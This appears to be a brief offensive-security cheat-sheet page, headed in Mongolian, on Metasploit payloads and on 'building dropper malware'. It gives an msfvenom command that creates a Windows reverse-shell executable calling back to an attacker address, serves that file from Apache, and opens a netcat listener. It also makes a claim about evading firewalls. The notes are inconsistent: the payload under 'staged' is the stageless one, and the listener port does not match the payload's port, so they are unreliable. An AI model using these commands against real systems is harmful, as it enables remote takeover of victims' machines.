⚔️Payloads

Payload-н төрлүүд болон firewall-д илрэхгүй хортой коднуудын талаар тайлбарлах болно

  • Staged

windows/x64/meterpreter_reverse_https

Connect back to attacker and spawn a Meterpreter shell

windows/x64/meterpreter/reverse_https

Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)

  • Non-staged

Building Dropper Malwares

kali@kali:~$ sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.120 LPORT=444 -f exe -o /var/www/html/shell.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes

kali@kali:~$ sudo service apache2 start

kali@kali:~$ sudo nc -lnvp 9001

listening on [any] 9001

  • -l --> incoming connection

  • -n --> avoid DNS lookups

  • -v --> verbose output

  • -p --> specify the TCP port

C:\Users\Offsec\Downloads>

Last updated